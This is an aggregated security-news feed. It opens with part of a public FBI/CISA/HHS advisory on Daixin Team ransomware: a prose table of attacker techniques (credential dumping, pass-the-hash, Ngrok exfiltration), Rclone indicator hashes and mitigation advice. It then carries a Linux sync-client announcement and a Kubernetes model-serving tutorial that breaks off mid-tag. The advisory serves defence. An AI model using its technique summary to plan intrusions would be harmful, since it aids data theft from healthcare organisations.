<p>Daixin actors use previously compromised credentials to access servers on the target network.</p>
</td>
</tr><tr><td>
<p>Persistence</p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Account Manipulation</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1098/">T1098</a></p>
</td>
<td>
<p>Daixin actors have leveraged privileged accounts to reset account passwords for VMware ESXi servers in the compromised environment.</p>
</td>
</tr><tr><td>
<p>Credential Access</p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>OS Credential Dumping</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1003/">T1003</a></p>
</td>
<td>
<p>Daixin actors have sought to gain privileged account access through credential dumping.</p>
</td>
</tr><tr><td>
<p>Lateral Movement</p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Remote Service Session Hijacking: SSH Hijacking</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1563/001">T1563.001</a></p>
</td>
<td>
<p>Daixin actors use SSH and RDP to move laterally across a network.</p>
</td>
</tr><tr><td>
<p>Remote Service Session Hijacking: RDP Hijacking</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1563/002">T1563.002</a></p>
</td>
<td>
<p>Daixin actors use RDP to move laterally across a network.</p>
</td>
</tr><tr><td>
<p>Use Alternate Authentication Material: Pass the Hash</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1550/002/">T1550.002</a></p>
</td>
<td>
<p>Daixin actors have sought to gain privileged account access through pass the hash. </p>
</td>
</tr><tr><td>
<p>Exfiltration</p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Exfiltration Over Web Service</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1567/">T1567</a></p>
</td>
<td>
<p>Daixin Team members have used <a href="https://attack.mitre.org/versions/v11/software/S0508/">Ngrok</a> for data exfiltration over web servers.</p>
</td>
</tr><tr><td>
<p>Impact</p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Data Encrypted for Impact</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1486/">T1486</a></p>
</td>
<td>
<p>Daixin actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.</p>
</td>
</tr></tbody></table><h3>INDICATORS OF COMPROMISE</h3>
<p>See Table 2 for IOCs obtained from third-party reporting.</p>
<p><em>Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes</em></p>
<table class="MsoTableGrid"><tbody><tr><td>
<p>File</p>
</td>
<td>
<p>SHA256</p>
</td>
</tr><tr><td>
<p>rclone-v1.59.2-windows-amd64\git-log.txt</p>
</td>
<td>
<p>9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238</p>
</td>
</tr><tr><td>
<p>rclone-v1.59.2-windows-amd64\rclone.1</p>
</td>
<td>
<p>19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD</p>
</td>
</tr><tr><td>
<p>rclone-v1.59.2-windows-amd64\rclone.exe</p>
</td>
<td>
<p>54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939</p>
</td>
</tr><tr><td>
<p>rclone-v1.59.2-windows-amd64\README.html</p>
</td>
<td>
<p>EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF</p>
</td>
</tr><tr><td>
<p>rclone-v1.59.2-windows-amd64\README.txt</p>
</td>
<td>
<p>475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28</p>
</td>
</tr></tbody></table><div>
<h3>Mitigations</h3>
</div>
<p>FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity:</p>
<ul><li>Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a>. Consider leveraging a centralized patch management system to automate and expedite the process.</li>
<li>Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.</li>
<li>If you use Remote Desktop Protocol (RDP), secure and monitor it.
<ul><li>Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.</li>
<li>Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for business purposes (e.g., RDP Transmission Control Protocol Port 3389).</li>
</ul></li>
<li>Turn off SSH and other network device management interfaces such as Telnet, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.</li>
<li>Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.</li>
<li>Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.</li>
<li>Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.</li>
<li>Secure PII/PHI at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TPS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.</li>
<li>Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.</li>
<li>Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.</li>
<li>Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.</li>
<li>Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.</li>
<li>In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.</li>
</ul><h3>Preparing for Ransomware</h3>
<ul><li>Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
<ul><li>Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.</li>
</ul></li>
<li>Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
<ul><li>Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
<ul><li>Refer to applicable state data breach laws and consult legal counsel when necessary.</li>
<li>For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and—in some cases—the media. Refer to the FTC’s <a href="https://www.ftc.gov/legal-library/browse/rules/health-breach-notification-rule">Health Breach Notification</a> Rule and U.S. Department of Health and Human Services’ <a href="https://www.hhs.gov/hipaa/for-professionals/breach-notification/index.html">Breach Notification Rule</a> for more information.</li>
</ul></li>
<li>See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, <a href="https://www.cisa.gov/sites/default/files/publications/CISA_Fact_Sheet-Protecting_Sensitive_and_Personal_Information_from_Ransomware-Caused_Data_Breaches-508C.pdf">Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches</a>, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.</li>
</ul></li>
</ul><h3>Mitigating and Preventing Ransomware</h3>
<ul><li>Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.</li>
<li>Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.</li>
<li>Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs.</li>
<li>Open document readers in protected viewing modes to help prevent active content from running.</li>
<li>Implement user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.</li>
<li>Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip <a href="https://www.cisa.gov/tips/st04-002">Choosing and Protecting Passwords</a> and the National Institute of Standards and Technology’s (NIST’s) <a href="https://csrc.nist.gov/publications/detail/sp/800-63b/final">Special Publication 800-63B: Digital Identity Guidelines</a> for more information.</li>
<li>Require administrator credentials to install software.</li>
<li>Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.</li>
<li>Install and regularly update antivirus and antimalware software on all hosts.</li>
<li>Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.</li>
<li>Consider adding an email banner to messages coming from outside your organizations.</li>
<li>Disable hyperlinks in received emails.</li>
</ul><h3>Responding to Ransomware Incidents</h3>
<p>If a ransomware incident occurs at your organization:</p>
<ul><li>Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).</li>
<li>Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.</li>
<li>Follow the notification requirements as outlined in your cyber incident response plan.</li>
<li>Report incidents to the FBI at a <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a>, CISA at <a href="https://www.cisa.gov/report">cisa.gov/report</a>, or the U.S. Secret Service (USSS) at a <a href="http://www.secretservice.gov/contact/field-offices/">USSS Field Office</a>.</li>
<li>Apply incident response best practices found in the joint Cybersecurity Advisory, <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a>, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.</li>
</ul><p><strong>Note: </strong>FBI, CISA, and HHS strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.</p>
<h3>REFERENCES</h3>
<ul><li><a href="https://www.stopransomware.gov/">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
<li>Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) <a href="https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf">Joint Ransomware Guide</a>.</li>
<li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0">Ransomware Readiness Assessment</a>.</li>
<li>Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at <a href="http://hhs.gov/HC3">hhs.gov/HC3</a></li>
<li>For additional best practices for Healthcare cybersecurity issues see the HHS 405(d) Aligning Health Care Industry Security Approaches at <a href="http://405d.hhs.gov/">405d.hhs.gov</a> </li>
</ul><h3>REPORTING</h3>
<p>The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to a <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a>, or CISA at <a href="https://www.cisa.gov/report">cisa.gov/report</a>.</p>
<h3>ACKNOWLEDGEMENTS</h3>
<p>FBI, CISA, and HHS would like to thank CrowdStrike and the Health Information Sharing and Analysis Center (Health-ISAC) for their contributions to this CSA.</p>
<h3>DISCLAIMER</h3>
<p>The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.</p>
<div>
<h3>Revisions</h3>
</div>
<p>Initial Publication: October 21, 2022</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rclone synchronisiert Google Drive]]></title>
<description><![CDATA[$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('pzRm0oGO_MM');
									});]]></description>
<link>https://tsecurity.de/de/1810289/it-security/rclone-synchronisiert-google-drive/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1810289/it-security/rclone-synchronisiert-google-drive/</guid>
<pubDate>Tue, 07 Mar 2023 06:24:09 +0100</pubDate>
<category>📰 IT Security</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/pzRm0oGO_MM/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<div id="ytplayer_pzRm0oGO_MM"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('pzRm0oGO_MM');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[Introducing Celeste: A GUI file synchronization client that can connect to any cloud provider]]></title>
<description><![CDATA[GitHub project: https://github.com/hwittenborn/celeste Flathub page: https://flathub.org/apps/details/com.hunterwittenborn.Celeste Snap page: https://snapcraft.io/celeste After a few months of work, I'm proud to introduce Celeste, a GUI file synchronization application that aims to work with virt...]]></description>
<link>https://tsecurity.de/de/1784559/linux-tipps/introducing-celeste-a-gui-file-synchronization-client-that-can-connect-to-any-cloud-provider/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1784559/linux-tipps/introducing-celeste-a-gui-file-synchronization-client-that-can-connect-to-any-cloud-provider/</guid>
<pubDate>Tue, 07 Feb 2023 18:16:01 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>GitHub project: <a href="https://github.com/hwittenborn/celeste">https://github.com/hwittenborn/celeste</a><br> Flathub page: <a href="https://flathub.org/apps/details/com.hunterwittenborn.Celeste">https://flathub.org/apps/details/com.hunterwittenborn.Celeste</a><br> Snap page: <a href="https://snapcraft.io/celeste">https://snapcraft.io/celeste</a></p> <hr><p>After a few months of work, I'm proud to introduce Celeste, a GUI file synchronization application that aims to work with virtually any cloud provider.</p> <p>Celeste started from my needs of needing a new desktop client for Nextcloud. The official one had some issues with memory leaks that would always end up freezing my main laptop, and the UI wasn't quite how I wanted it to be.</p> <p>This ended up with my wanting to develop a new GTK client for my needs, which was originally just going to be for WebDAV servers, but then I remembered about rclone and how it can connect to pretty much any storage provider out there. From that point I changed gears to making the application work with more cloud providers, thus getting to current state of Celeste.</p> <p>Currently Celeste can connect to Dropbox, Google Drive, Nextcloud, ownCloud, and generic WebDAV servers. More storage types are also planned for the future, including Microsoft OneDrive and Amazon S3.</p> <p>If you have any questions about the project or just want to leave some feedback, feel free to leave them in the comments below or on the project's GitHub page linked at the top :).</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/hwittenborn"> /u/hwittenborn </a> <br><span><a href="https://www.reddit.com/r/linux/comments/10w725p/introducing_celeste_a_gui_file_synchronization/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/10w725p/introducing_celeste_a_gui_file_synchronization/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scalable Serving with Kubernetes and Seldon Core: A tutorial]]></title>
<description><![CDATA[Learn how to deploy ML models in Kubernetes clusters and to implement autoscaling for our deployment with HPA and KEDAPhoto by Adam Kool on UnsplashIn most ML applications, deploying trained models to production is a crucial stage. It’s where the models demonstrate their values by giving predicti...]]></description>
<link>https://tsecurity.de/de/1774836/ai-nachrichten/scalable-serving-with-kubernetes-and-seldon-core-a-tutorial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1774836/ai-nachrichten/scalable-serving-with-kubernetes-and-seldon-core-a-tutorial/</guid>
<pubDate>Wed, 18 Jan 2023 20:01:30 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Learn how to deploy ML models in Kubernetes clusters and to implement autoscaling for our deployment with HPA and KEDA</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WoHT5rjJ8mEb40JjlSZhUg.jpeg"><figcaption>Photo by <a href="https://unsplash.com/@adamkool">Adam Kool</a> on <a href="https://unsplash.com/?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><p>In most ML applications, deploying trained models to production is a crucial stage. It’s where the models demonstrate their values by giving predictions for customers or other systems.</p><p>Deploying a model can be as simple as implementing a Flask server and then exporting its endpoints for users to call. Yet, It’s not easy to build a system that can robustly and reliably serve a large number of requests with strict response time or throughput requirements.</p><p>For medium and large businesses, the systems must be able to scale to process heavier workloads without significantly changing the codebase. Perhaps the corporation is expanding and needs a scalable system to handle the growing number of requests (this characteristic is scalability). The business needs the system to be able to adapt to traffic fluctuations (this characteristic is elasticity). These characteristics can be achieved if the systems are capable of autoscaling based on traffic volume.</p><p>In this tutorial, we’re going to learn how to deploy ML models in Kubernetes clusters with Seldon Core. We’ll also learn to implement autoscaling for our deployment with HPA and KEDA. The code for this tutorial can be found in this <a href="https://github.com/tintn/ml-model-deployment-tutorials">repo</a>.</p><h3>Train a PyTorch model</h3><p>To go through the deployment process, we’ll need a model. We use the model from this <a href="https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html">tutorial</a> from the official PyTorch website. It’s a simple image classification model that can run with CPU easily, so we can test the whole deployment process on local machines like your laptop.</p><p>Assume you’re in the toy-model folder of this <a href="https://github.com/tintn/ml-model-deployment-tutorials">repo</a>. You can train the model on the CIFAR10 dataset with:</p><pre>python train.py<br># Output: model.pth -&gt; the trained weights of the model</pre><p>Seldon Core uses <a href="https://github.com/triton-inference-server/server">Triton Inference Server</a> to serve PyTorch models, so we need to prepare the model in a format that it can be served with Triton. First, we need to export the model to TorchScript (it’s also possible to serve PyTorch models with Triton’s <a href="https://github.com/triton-inference-server/python_backend">python backend</a>, but it’s generally less efficient and more complicated to deploy).</p><p>Tracing and scripting are the two methods for exporting a model to TorchScript. The choice between them is still debatable, this <a href="https://ppwwyyxx.com/blog/2022/TorchScript-Tracing-vs-Scripting/">article</a> explores the benefits and drawbacks of both methods. We’ll use the tracing method to export the model:</p><pre>python export_to_ts.py -c model.pth -o model.ts<br># Output: model.ts <br># -&gt; serialized model containing both trained weights and the model's architecture</pre><p>Triton loads models from a model repository. It must contain information that the server needs to serve a model such as the model’s input/output information, backend to use… A model repository must follow the following structure:</p><pre>&lt;model-repository-path&gt;/<br>    &lt;model-name&gt;/<br>      [config.pbtxt]<br>      [&lt;output-labels-file&gt; ...]<br>      &lt;version&gt;/<br>        &lt;model-definition-file&gt;<br>      &lt;version&gt;/<br>        &lt;model-definition-file&gt;<br>      ...<br>    &lt;model-name&gt;/<br>      [config.pbtxt]<br>      [&lt;output-labels-file&gt; ...]<br>      &lt;version&gt;/<br>        &lt;model-definition-file&gt;<br>      &lt;version&gt;/<br>        &lt;model-definition-file&gt;<br>      ...<br>    ...</pre><p>In our case, we only have one model. Let’s call the model cifar10-pytorch, our model repo should have the following structure:</p><pre>cifar10-model<br>└── cifar10-pytorch<br>    ├── 1<br>    │   └── model.ts<br>    └── config.pbtxt</pre><p>cifar10-model is the repository's name, cifar10-pytorch is the model name and model.ts is the TorchScript model we just exported. config.pdtxt defines how the model should be served with Triton:</p><pre>platform: "pytorch_libtorch"<br>default_model_filename: "model.ts"<br>max_batch_size: 0<br>input [<br>  {<br>    name: "image__0"<br>    data_type: TYPE_UINT8<br>    dims: [-1, 3, -1, -1]<br>  }<br>]<br>output [<br>  {<br>    name: "probs__0"<br>    data_type: TYPE_FP32<br>    dims: [-1, 10]<br>  }<br>]</pre><p>You can find the final repository <a href="https://github.com/tintn/ml-model-deployment-tutorials/tree/main/toy-model/cifar10-model">here</a>. Triton supports several features that may be used to tune the model’s performance. You can also group multiple steps or multiple models into an inference pipeline to implement your business logic. However, I deliberately keep the model config simple to illustrate the entire process of model deployment instead of focusing on performance.</p><p>If you want to see a more realistic example of how to export and serve a PyTorch model with Triton, have a look at this <a href="https://tintn.github.io/deploy-detectron2-with-triton/">post</a>. It demonstrates how to use Triton to serve the MaskRCNN model from Detectron2, a popular model for instance segmentation and used in many real-world computer vision systems.</p><p>Triton can access models from local filesystem or cloud storage services (e.g. S3, Google Storage, or Azure Storage). As we’re going to deploy the model in Kubernetes, using a cloud storage service is more convenient because all nodes in the Kubernetes cluster can access the same models. We’ll use AWS S3 as the model repository in this tutorial. Assume that you already have an AWS account, let’s create an S3 bucket and upload the folder we have prepared:</p><pre>aws s3 cp --recursive cifar10-model s3://&lt;YOUR_BUCKET&gt;/cifar10-model</pre><p>Replace &lt;YOUR_BUCKET&gt; to the name of your bucket. We now have the model repository on AWS S3, we can start to deploy the model.</p><h3>Deploy models with Seldon Core</h3><p>We’ll deploy the model to a Kubernetes cluster with Seldon Core, a framework specializing in ML model deployment and monitoring. Let’s create a local Kubernetes cluster, so we can test the deployment process using our local machine.</p><p><a href="https://kind.sigs.k8s.io/docs/user/quick-start/#installation">Kind</a> can be used to create local clusters. At the time of writing, Seldon Core has an <a href="https://github.com/SeldonIO/seldon-core/issues/4339">issue</a> with k8s ≥ 1.25, so we have to use version 1.24 or older. To specify the k8s version with Kind, just choose the image with the corresponding version to start a cluster. The following command creates a local cluster named kind-seldon with k8s==1.24.7:</p><pre>kind create cluster --name seldon --image kindest/node:v1.24.7</pre><p>Also, make sure you have docker, kubectl, helm installed on your local machine. Switching the context of kubectl to kind-seldon instructs kubectl to connect to the newly created cluster by default:</p><pre>kubectl cluster-info --context kind-seldon</pre><h4>Install Seldon Core</h4><p>We’ll use <a href="https://istio.io/">Istio</a> as the cluster’s Ingress and Seldon Core as the serving platform. You can find the installation instruction <a href="https://docs.seldon.io/projects/seldon-core/en/latest/install/kind.html">here</a>. After installing Istio and Seldon Core, run these commands to check if they are all correctly installed:</p><pre>kubectl get svc -n istio-system<br># NAME                   TYPE           CLUSTER-IP     EXTERNAL-IP   PORT(S)                                                                      AGE<br># istio-egressgateway    ClusterIP      10.96.90.103   &lt;none&gt;        80/TCP,443/TCP                                                               3m29s<br># istio-ingressgateway   LoadBalancer   10.96.229.8    &lt;pending&gt;     15021:30181/TCP,80:32431/TCP,443:30839/TCP,31400:32513/TCP,15443:32218/TCP   3m28s<br># istiod                 ClusterIP      10.96.195.7    &lt;none&gt;        15010/TCP,15012/TCP,443/TCP,15014/TCP                                        8m48s</pre><p>Check if the Istio gateway is running:</p><pre>kubectl get gateway -n istio-system<br># NAME             AGE<br># seldon-gateway   5m17s</pre><p>Check if the Seldon controller is running:</p><pre>kubectl get pods -n seldon-system<br># NAME                                        READY   STATUS    RESTARTS   AGE<br># seldon-controller-manager-b74d66684-qndf6   1/1     Running   0          4m18Create an Istio gateway to manage the cluster’s traffic:</pre><p>If you haven’t done it, make sure the label istio-injection is enabled:</p><pre>kubectl label namespace default istio-injection=enabled</pre><p>The Istio gateway is running on port 80 in the cluster, we need to forward a port from your local machine to that port so we can access it externally:</p><pre>kubectl port-forward -n istio-system svc/istio-ingressgateway 8080:80</pre><h4>Serving with Seldon Core</h4><p>If your model repository is stored in a private bucket, you need to grant permission to access your bucket from within the cluster. It can be done by creating a secret and then referring to it when creating a deployment. This is a template to create secrets for S3 buckets:</p><pre>apiVersion: v1<br>kind: Secret<br>metadata:<br>  name: seldon-rclone-secret<br>type: Opaque<br>stringData:<br>  RCLONE_CONFIG_S3_TYPE: s3<br>  RCLONE_CONFIG_S3_PROVIDER: aws<br>  RCLONE_CONFIG_S3_ENV_AUTH: "false"<br>  RCLONE_CONFIG_S3_ACCESS_KEY_ID: "&lt;AWS_ACCESS_KEY_ID&gt;"<br>  RCLONE_CONFIG_S3_SECRET_ACCESS_KEY: "&lt;AWS_SECRET_ACCESS_KEY&gt;"</pre><p>Replace AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY with your actual AWS access key ID and secret access key. Create the secret:</p><pre>kubectl apply -f secret.yaml</pre><p>We can deploy the model with this <a href="https://github.com/tintn/ml-model-deployment-tutorials/blob/main/scalable-serving/cifar10-deploy.yaml">manifest</a>, notice the created secret is referred to in the manifest with the envSecretRefName key. Make sure that spec.predictors[].graph.name matches the model name you uploaded to your model repository. Apply the manifest to create a deployment:</p><pre>kubectl apply -f cifar10-deploy.yaml</pre><p>If this is your first deployment in this cluster, it’ll take a while to download the necessary docker images. Check if the model is successfully deployed:</p><pre>kubectl get deploy<br># NAME                                READY   UP-TO-DATE   AVAILABLE   AGE<br># cifar10-default-0-cifar10-pytorch   1/1     1            1           41m</pre><p>I created a <a href="https://github.com/tintn/ml-model-deployment-tutorials/blob/main/testing/test.py">script</a> using Locust to test the deployed models. You need to install the <a href="https://github.com/tintn/ml-model-deployment-tutorials/blob/main/testing/requirements.txt">requirements</a> needed for the script to run first:</p><pre>pip install -r requirements.txt</pre><p>Given that localhost:8080 has been port-forwarded to the cluster's gateway, run the following command to send requests to models deployed with Seldon:</p><pre>locust -f test.py --headless -u 100 -r 10 --run-time 180 -H http://localhost:8080</pre><p>If your deployment name or model names are different, you can adjust the deployment’s URL accordingly in the script. The URL for a deployed model follows Seldon Core’s <a href="https://docs.seldon.io/projects/seldon-core/en/latest/reference/apis/v2-protocol.html">inference protocol</a>:</p><pre>/seldon/{namespace}/{model_repo}/v2/models/{model_name}/versions/{model_version}/infer</pre><p>We’ve deployed our custom model with Seldon Core and tested it by sending inference requests to the model. In the next section, we’ll explore how to scale the deployment to handle more users or higher traffic.</p><h3>Pod Autoscaling with HPA</h3><p>When it comes to scalability, Kubernetes offers HPA (Horizontal Pod Autoscaling). When certain metrics reach their thresholds for a resource (e.g. CPU or memory), HPA can add more pods to process heavier workloads.</p><h4>Install Metrics Server</h4><p>HPA needs to fetch metrics from an aggregated API, which is usually provided through a <a href="https://github.com/kubernetes-sigs/metrics-server">Metrics Server</a>. You can install a metrics server for your cluster with:</p><pre>kubectl apply -f https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml</pre><p>If your cluster is local, you also need to disable certificate validation by passing the argument -kubelet-insecure-tls to the server:</p><pre>kubectl patch -n kube-system deployment metrics-server --type=json \<br>  -p '[{"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--kubelet-insecure-tls"}]'</pre><h4>Deploy models with HPA</h4><p>We can enable HPA in the deployment manifest by adding hpaSpec for the corresponding component:</p><pre>hpaSpec:<br>  maxReplicas: 2<br>  metrics:<br>  - resource:<br>      name: cpu  # This can be either "cpu" or "memory"<br>      targetAverageUtilization: 50<br>    type: Resource<br>  minReplicas: 1</pre><p>The HPA spec tells the deployment to scale up when the current metric value (CPU usage in this case) is higher than 50% of the desired value, and the maximum replicas that the deployment can possibly have are 2.</p><p>Apply this <a href="https://github.com/tintn/ml-model-deployment-tutorials/blob/main/scalable-serving/cifar10-deploy-hpa.yaml">manifest</a> to create a deployment with HPA, make sure you replace &lt;YOUR_BUCKET&gt; with your bucket name and the secret for accessing the bucket (as mentioned in the previous section) has been created:</p><pre>kubectl apply -f cifar10-deploy-hpa.yaml</pre><p>You can see the current metric value with:</p><pre>kubectl get hpa<br># NAME                                REFERENCE                                      TARGETS   MINPODS   MAXPODS   REPLICAS   AGE<br># cifar10-default-0-cifar10-pytorch   Deployment/cifar10-default-0-cifar10-pytorch   0%/50%    1         2         1          98m</pre><p>Let’s check the running pods. You should see a running pod for the deployed model:</p><pre>kubectl get pods<br># NAME                                                 READY   STATUS    RESTARTS   AGE<br># cifar10-default-0-cifar10-pytorch-7744fdc4dd-vzx4x   3/3     Running   0          101m</pre><p>Now we can test the deployed model with our <a href="https://github.com/tintn/ml-model-deployment-tutorials/blob/main/testing/test.py">test script</a> (which was mentioned in the previous section):</p><pre>locust -f test.py --headless -u 100 -r 10 --run-time 180 -H http://localhost:8080</pre><p>Monitoring the current metric value with kubectl get hpa -w, you can see after a while the metric value exceeds the threshold, and HPA will trigger the creation of a new pod:</p><pre>kubectl get pods<br># NAME                                                 READY   STATUS    RESTARTS   AGE<br># cifar10-default-0-cifar10-pytorch-7744fdc4dd-pgpxm   3/3     Running   0          10s<br># cifar10-default-0-cifar10-pytorch-7744fdc4dd-vzx4x   3/3     Running   0          108m</pre><p>If the current metric value is lower than the threshold for a certain period (it’s 5 minutes by default), HPA will scale down the deployment. The period can be configured with the argument --horizontal-pod-autoscaler-downscale-stabilization flag to kube-controller-manager:</p><pre>kubectl get pods<br># NAME                                                 READY   STATUS        RESTARTS   AGE<br># cifar10-default-0-cifar10-pytorch-7744fdc4dd-pgpxm   3/3     Terminating   0          7m3s<br># cifar10-default-0-cifar10-pytorch-7744fdc4dd-vzx4x   3/3     Running       0          114m</pre><p>In this section, we’ve learned how to scale the number of pods up and down based on CPU usage. In the next section, we’ll use KEDA to scale our deployment more flexibly based on custom metrics.</p><h3>Pod Autoscaling with KEDA</h3><p>KEDA can fetch metrics from many sources (they are called scalers), see the list of supported scalers <a 